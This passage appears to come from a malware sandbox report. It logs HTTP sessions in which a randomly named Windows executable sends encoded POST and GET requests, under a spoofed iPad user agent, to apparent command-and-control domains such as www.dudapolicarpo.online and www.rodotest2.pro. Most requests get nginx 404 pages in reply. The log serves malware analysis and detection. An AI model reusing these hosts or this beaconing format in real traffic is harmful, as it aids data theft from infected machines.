                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                          Jul 3, 2024 15:59:44.940102100 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                                          Jul 3, 2024 15:59:44.940118074 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                                          Jul 3, 2024 15:59:44.940138102 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.449783162.240.81.18801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:46.894993067 CEST770OUTPOST /8pbu/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.dudapolicarpo.online
                                                          Origin: http://www.dudapolicarpo.online
                                                          Referer: http://www.dudapolicarpo.online/8pbu/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 70 50 6c 48 48 68 35 6b 75 37 55 35 7a 71 64 73 44 54 52 37 72 36 47 37 6b 4d 4a 67 39 65 42 50 6a 54 34 76 37 4d 31 6a 77 4f 69 65 52 34 66 42 4f 75 63 2f 63 36 6a 74 55 68 38 45 63 65 48 39 6e 6d 6c 59 44 76 78 4f 56 66 4e 53 36 7a 78 47 33 52 62 65 5a 73 4e 6c 62 4c 38 69 30 55 6d 32 30 33 30 66 4c 4c 75 73 63 68 49 6d 6f 55 36 67 68 63 72 6c 42 51 41 65 2b 49 48 36 4a 72 61 35 71 7a 52 58 63 48 35 5a 2f 78 54 53 67 59 47 62 53 45 35 43 6f 70 44 30 55 53 62 78 56 7a 46 48 74 32 61 4a 47 6b 5a 66 7a 78 33 6a 68 77 33 64 49 38 6a 41 59 4e 39 77 63 49 59 32 77 59 35 41 43 69 65 78 79 31 65 6d 6b 78 77 6e 4a 56 2f 36 53 4a 66 62 75 6f 6b 3d
                                                          Data Ascii: TvpPfhGp=pPlHHh5ku7U5zqdsDTR7r6G7kMJg9eBPjT4v7M1jwOieR4fBOuc/c6jtUh8EceH9nmlYDvxOVfNS6zxG3RbeZsNlbL8i0Um2030fLLuschImoU6ghcrlBQAe+IH6Jra5qzRXcH5Z/xTSgYGbSE5CopD0USbxVzFHt2aJGkZfzx3jhw3dI8jAYN9wcIY2wY5ACiexy1emkxwnJV/6SJfbuok=
                                                          Jul 3, 2024 15:59:47.478207111 CEST1236INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.20.1
                                                          Date: Wed, 03 Jul 2024 13:59:47 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 3650
                                                          Connection: close
                                                          ETag: "663a05b6-e42"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                          Jul 3, 2024 15:59:47.478220940 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                                          Jul 3, 2024 15:59:47.478233099 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                                          Jul 3, 2024 15:59:47.478249073 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          47192.168.2.449784162.240.81.18801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:49.432513952 CEST10852OUTPOST /8pbu/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.dudapolicarpo.online
                                                          Origin: http://www.dudapolicarpo.online
                                                          Referer: http://www.dudapolicarpo.online/8pbu/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 70 50 6c 48 48 68 35 6b 75 37 55 35 7a 71 64 73 44 54 52 37 72 36 47 37 6b 4d 4a 67 39 65 42 50 6a 54 34 76 37 4d 31 6a 77 4f 71 65 52 4e 54 42 66 35 49 2f 61 4b 6a 74 4b 78 38 48 63 65 48 67 6e 6c 56 63 44 76 38 7a 56 64 31 53 37 51 35 47 78 67 62 65 58 63 4e 6c 54 72 38 6e 37 30 6d 6e 30 33 6b 62 4c 4c 2b 73 63 68 49 6d 6f 57 69 67 31 39 72 6c 44 51 41 5a 35 49 48 49 4e 72 61 52 71 33 45 73 63 48 39 6e 2f 43 72 53 6e 38 69 62 66 57 52 43 6b 70 44 32 5a 79 61 30 56 7a 4a 59 74 32 32 2f 47 6c 74 68 7a 7a 72 6a 33 56 4b 33 4d 2f 7a 30 44 38 39 50 45 49 63 4e 30 72 70 77 5a 79 2b 57 68 33 32 4b 77 52 73 45 4e 30 47 76 49 38 62 39 73 76 69 36 4b 2f 4e 48 37 6e 73 46 6a 35 58 6e 56 70 59 39 53 5a 42 5a 69 74 54 6f 31 6f 63 4d 6d 6d 4f 4d 59 76 56 39 75 4a 75 59 67 38 77 72 44 41 2f 67 32 77 71 4c 4a 6e 49 58 52 47 65 42 67 69 58 51 4f 4a 39 52 54 4e 41 57 2b 4c 45 4a 63 38 63 61 55 33 51 70 64 36 32 66 4e 6e 54 64 66 4e 4c 47 38 33 34 6b 48 6f 33 37 4a 7a 72 4f 4c 52 31 6a 74 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=pPlHHh5ku7U5zqdsDTR7r6G7kMJg9eBPjT4v7M1jwOqeRNTBf5I/aKjtKx8HceHgnlVcDv8zVd1S7Q5GxgbeXcNlTr8n70mn03kbLL+schImoWig19rlDQAZ5IHINraRq3EscH9n/CrSn8ibfWRCkpD2Zya0VzJYt22/Glthzzrj3VK3M/z0D89PEIcN0rpwZy+Wh32KwRsEN0GvI8b9svi6K/NH7nsFj5XnVpY9SZBZitTo1ocMmmOMYvV9uJuYg8wrDA/g2wqLJnIXRGeBgiXQOJ9RTNAW+LEJc8caU3Qpd62fNnTdfNLG834kHo37JzrOLR1jt6EBUvRVJLnH1Eo2/1UvqHbn3K1c9vyR2F9HIShF+HmfQ72E5DnYuIn55RQRKanvzJj9cZaWbGTc77HLH30MySnlKLJ9WZSoWUCt5SXsilsdElYwWwkPzNJJanSSFNuqYSYv8cjd9bSlG5JIm6cO+ntUAzoAqayN4G+1yS1QUPoyOWYDn/xF1cTlAiKutgdpR6eAWjHseHJ/ZkKoRtPW/5ovRtVmGDSbn1bbZClC4PreJqNR9iN34mCfU3RfcawCeycd0cz2+oxn8t997tX7ZpXzTGbFqbVGv9o44mEJZffqsPbvj5imigmJmVZt4z/dR+aL842mn6mBrYRil/uzfqKGrEdXbqXp2zLqcfoDMOjRmkSxv3eAv2AwdbMgFCIt1KnkBnmV4HaEAUiqfmSFGk/xZJWzcI9wJR8dML+QqXhhDOjWinCtoPrBKmuvWFr55thMKiajBp46GqhHzoMFn3SGSAp/AosvXK13wKnNsIQzQGkPI81PUHIqF/adPnJuXNdDIjHz7KwigwVQfAfMhTBMEY7DshKst5/dVXpkJmWKutZDteK5enSWmfgjJuec94j4jJlZmGmcDU/PSoTWNsXiXC+AC8t92Nm07T8Dk9nGzKetlY5eH2zQwYO1MHEUG1/gNGlflgdesRPl4tArPvjvs/dVxSW4Yqn [TRUNCATED]
                                                          Jul 3, 2024 15:59:49.996375084 CEST1236INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.20.1
                                                          Date: Wed, 03 Jul 2024 13:59:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 3650
                                                          Connection: close
                                                          ETag: "663a05b6-e42"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                          Jul 3, 2024 15:59:49.996396065 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                                          Jul 3, 2024 15:59:49.996408939 CEST448INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                                          Jul 3, 2024 15:59:50.002183914 CEST903INData Raw: 69 62 75 74 65 64 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 46 65 64 6f 72 61 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 74 3e 2f 75 73
                                                          Data Ascii: ibuted with Fedora. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>error_pag


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          48192.168.2.449785162.240.81.18801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:51.980530024 CEST469OUTGET /8pbu/?TvpPfhGp=kNNnEV5wtfMTk7EsKDdqofuXk+Rn8vJj2yYB/JV+5cekMazgA8cmAYXSGgFhL+XbvnxEPdo1Vtw1uTcXwhetC6FtU7s9g1m4smEVJIuSZwU+vhX8ycfAGhs=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.dudapolicarpo.online
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:59:52.541429043 CEST1236INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.20.1
                                                          Date: Wed, 03 Jul 2024 13:59:52 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 3650
                                                          Connection: close
                                                          ETag: "663a05b6-e42"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                          Jul 3, 2024 15:59:52.541451931 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                                          Jul 3, 2024 15:59:52.541465998 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                                          Jul 3, 2024 15:59:52.541476011 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          49192.168.2.4497863.33.130.190801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:57.713947058 CEST729OUTPOST /50i6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.rodotest2.pro
                                                          Origin: http://www.rodotest2.pro
                                                          Referer: http://www.rodotest2.pro/50i6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 6e 67 46 30 66 61 5a 6a 56 4d 57 41 73 4e 78 61 59 4b 65 53 54 79 4d 2b 36 30 6b 39 31 46 61 53 36 77 52 66 64 52 46 64 56 2b 7a 49 36 77 49 4c 64 38 34 55 4b 49 46 34 61 6f 32 2f 4b 54 59 48 2b 59 67 63 66 64 75 77 79 75 2f 35 76 75 71 61 4d 75 6d 55 6b 38 74 30 63 35 51 66 4e 39 56 78 31 4c 50 72 6f 73 76 4a 4e 63 66 44 67 7a 54 43 42 46 30 38 31 4a 74 31 42 57 43 6b 74 49 5a 7a 65 61 46 4c 7a 79 38 6c 73 39 4f 37 78 57 50 6c 47 44 45 4b 76 62 62 57 77 56 73 2f 7a 6c 4b 5a 6a 57 36 65 65 78 2f 71 2f 6c 2b 76 54 55 4d 68 47 51 63 58 54 2b 57 4e 76 41 67 78 69 75 77 64 32 67 3d 3d
                                                          Data Ascii: TvpPfhGp=ngF0faZjVMWAsNxaYKeSTyM+60k91FaS6wRfdRFdV+zI6wILd84UKIF4ao2/KTYH+Ygcfduwyu/5vuqaMumUk8t0c5QfN9Vx1LProsvJNcfDgzTCBF081Jt1BWCktIZzeaFLzy8ls9O7xWPlGDEKvbbWwVs/zlKZjW6eex/q/l+vTUMhGQcXT+WNvAgxiuwd2g==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          50192.168.2.4497873.33.130.190801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 16:00:00.244010925 CEST749OUTPOST /50i6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.rodotest2.pro
                                                          Origin: http://www.rodotest2.pro
                                                          Referer: http://www.rodotest2.pro/50i6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 6e 67 46 30 66 61 5a 6a 56 4d 57 41 73 70 31 61 55 4a 47 53 45 43 4d 35 77 55 6b 39 37 56 61 57 36 77 74 66 64 56 31 4e 56 4c 44 49 36 51 59 4c 50 74 34 55 4a 49 46 34 50 59 32 41 58 6a 59 4d 2b 59 39 72 66 66 36 77 79 75 72 35 76 76 61 61 4d 5a 79 54 6b 73 74 32 51 5a 52 5a 4a 39 56 78 31 4c 50 72 6f 6f 47 6d 4e 64 33 44 68 44 44 43 44 6e 63 37 37 70 74 32 41 57 43 6b 6e 6f 5a 33 65 61 46 74 7a 32 6c 2b 73 2b 32 37 78 57 66 6c 42 57 6f 4c 32 72 62 51 74 46 74 54 37 30 76 68 73 54 33 71 41 79 75 4e 34 78 79 45 62 79 64 37 58 68 39 41 42 2b 79 2b 79 48 70 46 76 74 4e 55 74 69 78 6b 73 44 76 56 77 71 73 71 75 54 44 35 78 4d 4b 6a 53 65 55 3d
                                                          Data Ascii: TvpPfhGp=ngF0faZjVMWAsp1aUJGSECM5wUk97VaW6wtfdV1NVLDI6QYLPt4UJIF4PY2AXjYM+Y9rff6wyur5vvaaMZyTkst2QZRZJ9Vx1LProoGmNd3DhDDCDnc77pt2AWCknoZ3eaFtz2l+s+27xWflBWoL2rbQtFtT70vhsT3qAyuN4xyEbyd7Xh9AB+y+yHpFvtNUtixksDvVwqsquTD5xMKjSeU=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          51192.168.2.4497883.33.130.190801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 16:00:02.772445917 CEST10831OUTPOST /50i6/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.rodotest2.pro
                                                          Origin: http://www.rodotest2.pro
                                                          Referer: http://www.rodotest2.pro/50i6/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
